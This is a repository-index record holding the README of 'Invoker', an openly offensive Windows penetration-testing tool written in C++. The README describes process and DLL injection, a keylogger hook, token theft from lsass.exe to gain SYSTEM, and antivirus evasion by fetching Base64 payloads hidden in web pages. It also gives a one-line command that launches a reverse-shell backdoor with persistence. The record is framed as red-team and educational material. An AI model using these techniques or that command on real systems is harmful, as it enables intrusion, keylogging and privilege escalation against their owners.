{"id":13622179,"url":"https://github.com/ivan-sincek/invoker","last_synced_at":"2025-04-07T06:12:58.352Z","repository":{"id":53062414,"uuid":"196415687","full_name":"ivan-sincek/invoker","owner":"ivan-sincek","description":"Penetration testing utility and antivirus assessment tool.","archived":false,"fork":false,"pushed_at":"2023-04-25T19:14:02.000Z","size":431,"stargazers_count":316,"open_issues_count":0,"forks_count":80,"subscribers_count":8,"default_branch":"master","last_synced_at":"2025-03-31T05:05:27.867Z","etag":null,"topics":["access-token","bytecode-injection","c-plus-plus","dll-injection","dump-memory","ethical-hacking","hook-procedure","malware","offensive-security","penetration-testing","process-ghosting","process-hollowing","red-team-engagement","reverse-tcp","security","sticky-keys","system-calls","task-scheduler","windows","windows-penetration-testing"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-07-11T14:58:41.000Z","updated_at":"2025-03-19T11:20:04.000Z","dependencies_parsed_at":"2023-02-17T11:45:21.853Z","dependency_job_id":"458a8b7b-8c7c-488e-a902-1fd034daa56a","html_url":"https://github.com/ivan-sincek/invoker","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Finvoker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Finvoker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Finvoker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Finvoker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/invoker/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247601449,"owners_count":20964864,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["access-token","bytecode-injection","c-plus-plus","dll-injection","dump-memory","ethical-hacking","hook-procedure","malware","offensive-security","penetration-testing","process-ghosting","process-hollowing","red-team-engagement","reverse-tcp","security","sticky-keys","system-calls","task-scheduler","windows","windows-penetration-testing"],"created_at":"2024-08-01T21:01:15.231Z","updated_at":"2025-04-07T06:12:58.329Z","avatar_url":"https://github.com/ivan-sincek.png","language":"C++","funding_links":[],"categories":["C++","C++ (225)"],"sub_categories":[],"readme":"# Invoker\n\nPenetration testing utility and antivirus assessment tool.\n\nBuilt with Visual Studio Community 2022 v17.5.4 (64-bit) and tested on Windows 10 Enterprise OS (64-bit).\n\nMade for educational purposes. I hope it will help!\n\n**This repository started to have known signatures and I don't have time to upload new executables each time so you should compile this project yourself.**\n\nUseful websites:\n\n* [elastic.co](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process)\n* [learn.microsoft.com](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format)\n* [processhacker.sourceforge.io](https://processhacker.sourceforge.io/doc/index.html)\n* [undocumented.ntinternals.net](http://undocumented.ntinternals.net/index.html)\n* [pinvoke.net](https://www.pinvoke.net)\n\nTo do:\n\n* make process ghosting compatible with x86 architecture because `NtCreateProcessEx` doesn't work well with 32-bit processes.\n\nFuture plans:\n\n* ~~process hollowing,~~\n* process doppelgänging,\n* process herpaderping,\n* ~~process ghosting,~~\n* more DLL proxying invocations,\n* COM hijacking,\n* Python3 script to statically obfuscate whole source code.\n\nThings I keep in mind while coding:\n\n* simplify everything,\n* ~~use dynamic allocations instead of static allocations,~~ (sometimes)\n* use minimum required access rights and control flags,\n* handle/catch possible errors/exceptions,\n* zero-out and free arrays and memory after use,\n* properly close open handles/streams after use,\n* decrement reference count of libraries, objects, and similar after use,\n* ~~call the garbage cleaner before exiting.~~ (not applicable)\n\nAll of the above will result in your PE having smaller size and lesser detection rate.\n\n## Table of Contents\n\n* [Invoker Library](#invoker-library)\n* [How to Run](#how-to-run)\n* [Bytecode Injection](#bytecode-injection)\n* [Generate a Reverse Shell Payload](#generate-a-reverse-shell-payload)\n* [PowerShell](#powershell)\n* [Direct System Calls](#direct-system-calls)\n* [Make a DLL With a Hook Procedure](#make-a-dll-with-a-hook-procedure)\n* [Get the LocalSystem Account (NT AUTHORITY\\SYSTEM)](#get-the-localsystem-account-nt-authoritysystem)\n* [Images](#images)\n\n## Invoker Library\n\nFeatures:\n\n* invoke the system shells,\n* ~~make direct system calls,~~\n* use Windows Management Instrumentation (WMI),\n* connect to a remote host,\n* terminate a running process,\n* run a new process,\n* dump the memory of a process,\n* tamper with the executable image of a process,\n* inject bytecode into a process,\n* inject DLL into a process,\n* list loaded DLLs of a process,\n* invoke DLL hijacking,\n* install a hook procedure,\n* enable access token privileges,\n* duplicate the access token of a process and run a new process,\n* download a file,\n* add/edit a registry key,\n* schedule a task,\n* list unquoted service paths and start, stop, or restart a service,\n* replace multiple System32 files.\n\nCheck the Invoker library [here](https://github.com/ivan-sincek/invoker/blob/master/src/Invoker/Invoker/lib/invoker/invoker.cpp). Feel free to use it!\n\n---\n\nSome features may require administrative privilege.\n\nSome features may not work on Windows XP and earlier because of some specific access rights and control flags used.\n\n## How to Run\n\nRun Invoker_x86.exe (32-bit) or Invoker_x64.exe (64-bit).\n\nTo automate the reverse shell backdoor while adding persistence, run the following command:\n\n```fundamental\nInvoker_x64.exe 192.168.8.5:9000\n```\n\n32-bit Invoker can:\n\n* make direct system calls,\n* dump the memory of a 32-bit process,\n* tamper with and inject the executable image of a 32-bit process into 32-bit process,\n* tamper with and inject the executable image of a 64-bit process into 64-bit process,\n* inject 32-bit bytecode into a 32-bit process,\n* inject 32-bit DLL into a 32-bit process,\n* list loaded DLLs of a 32-bit process,\n* install a hook procedure from a 32-bit DLL.\n\n64-bit Invoker can:\n\n* make direct system calls,\n* dump the memory of a 32-bit process,\n* dump the memory of a 64-bit process,\n* ~~tamper with and inject the executable image of a 32-bit process into 32-bit process,~~\n* tamper with and inject the executable image of a 64-bit process into 64-bit process,\n* inject 32-bit bytecode into a 32-bit process,\n* inject 64-bit bytecode into a 64-bit process,\n* ~~inject 32-bit DLL into a 32-bit process,~~\n* inject 64-bit DLL into a 64-bit process,\n* ~~list loaded DLLs of a 32-bit process,~~\n* list loaded DLLs of a 64-bit process.\n* ~~install a hook procedure from a 32-bit DLL,~~\n* install a hook procedure from a 64-bit DLL.\n\nNote that each injection technique has both, pros and cons; e.g. some technique requires less access rights, uses less suspicious methods, etc., but might e.g. crash the process, need some time and other special conditions to execute the payload, etc.\n\nNote that some C2C implants might not work after releasing the memory. In that case, comment out methods like `VirtualFreeEx`, `NtFreeVirtualMemory`, etc.\n\n## Bytecode Injection\n\nElevate privileges by injecting bytecode into a higher-privileged process.\n\nThis tool can download the content of a binary file in the memory and inject it into a running process. It can also parse an HTTP response and extract the payload from a custom element, e.g. from `\u003cinvoker\u003epayload\u003c/invoker\u003e` where `payload` is a binary code encoded in Base64.\n\nCheck the example at [pastebin.com/raw/xf9Trt0d](https://pastebin.com/raw/xf9Trt0d).\n\nThis is useful if antivirus is constantly deleting your local payloads.\n\nCheck an additional example at [pastebin.com/raw/iW17rCxH](https://pastebin.com/raw/iW17rCxH) - payload hidden in the image element.\n\nP.S. Bytecodes provided will most certainly not work for you.\n\nUse [ngrok](https://ngrok.com) to give your local web server a public address.\n\n---\n\nTo see if a process is 32-bit or 64-bit, open Task Manager -\u003e click on `More details` -\u003e go to `Details` tab -\u003e right click on any of the columns -\u003e click on `Select columns` -\u003e check the `Platform` checkbox.\n\nTo see if a process is running with administrative privilege, check the `Elevated` checkbox.\n\n## Generate a Reverse Shell Payload\n\nFind out how to generate a reverse shell payload from my other [project](https://github.com/ivan-sincek/penetration-testing-cheat-sheet#generate-a-reverse-shell-payload-for-windows-os), as well as, how to set up [Ncat](https://github.com/ivan-sincek/penetration-testing-cheat-sheet#ncat) and [multi/handler](https://github.com/ivan-sincek/penetration-testing-cheat-sheet#multihandler) listeners.\n\nBytecode injection may fail because bytecode may have bad characters, wrong exit function, or encoding; DLL injection is more reliable.\n\n## PowerShell\n\nIf you wish to run a PowerShell reverse or bind shell from the Invoker, open the Invoker and start a PowerShell session, then, run any of the [one-liners](https://github.com/ivan-sincek/powershell-reverse-tcp#powershell-encoded-command) (from my other project).\n\n## Direct System Calls\n\nDirect system calls library and assembly were generated with [SysWhispers2](https://github.com/jthuraisamy/SysWhispers2). Credits to the author!\n\nTo generate the same library and assembly, run the following command from your preferred console:\n\n```fundamental\npython3 syswhispers.py -f NtOpenProcess,NtClose,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,NtCreateThreadEx,NtTerminateProcess -a all -o syscalls\n```\n\nCheck my wrapper around the library and assembly [here](https://github.com/ivan-sincek/invoker/blob/master/src/Invoker/Invoker/lib/invoker_syscalls/invoker_syscalls.cpp). Feel free to use it!\n\n## Make a DLL With a Hook Procedure\n\nCheck the simple DLL with a hook procedure [here](https://github.com/ivan-sincek/invoker/blob/master/src/InvokerHook/InvokerHook/dllmain.cpp). The hook procedure will invoke a message box on each window close.\n\nCheck the keyboard hook procedure (i.e. keylogger) [here](https://github.com/ivan-sincek/invoker/blob/master/src/KeyboardHook/KeyboardHook/dllmain.cpp).\n\nCheck the mouse hook procedure that will run a new process on the first mouse click [here](https://github.com/ivan-sincek/invoker/blob/master/src/RunProcessHook/RunProcessHook/dllmain.cpp).\n\nDon't forget to remove all the created artifacts after you are done testing, e.g. remove `keylogger.log`, etc.\n\n## Get the LocalSystem Account (NT AUTHORITY\\SYSTEM)\n\nFollow these simple steps:\n\n1. Run the Invoker as administrator.\n\n2. Enable all access token privileges.\n\n3. Duplicate the access token from e.g. Local Security Authority Subsystem Service (lsass.exe) and run a new instance of the Invoker.\n\n4. Within the new Invoker instance, open the Command Prompt and run `whoami`, you should now see `nt authority\\system`.\n\n5. Enable all access token privileges once again.\n\n6. Close the old Invoker instance.\n\n## Images\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/invoker/blob/master/img/invoker.jpg\" alt=\"Invoker\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 1 - Invoker\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/invoker/blob/master/img/bytecode_injection.jpg\" alt=\"Bytecode Injection\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 2 - Bytecode Injection\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/invoker/blob/master/img/elevated_privileges.jpg\" alt=\"Elevated Privileges\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 3 - Elevated Privileges\u003c/p\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Finvoker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Finvoker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Finvoker/lists"}